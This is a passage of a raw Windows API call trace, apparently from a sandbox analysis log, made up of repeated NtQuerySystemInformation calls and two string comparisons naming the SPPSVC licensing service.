NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x28, ResultLength=0x0) [0243.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe230, Length=0x50, ResultLength=0x0) [0243.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x28, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x28, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x28, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf60, Length=0x20, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe160, Length=0x38, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x20, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe370, Length=0x28, ResultLength=0x0) [0243.920] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x28, ResultLength=0x0) [0243.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe370, Length=0x28, ResultLength=0x0) [0243.930] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3f0, Length=0x50, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x28, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x28, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x28, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe320, Length=0x38, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1a0, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe130, Length=0x20, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.939] 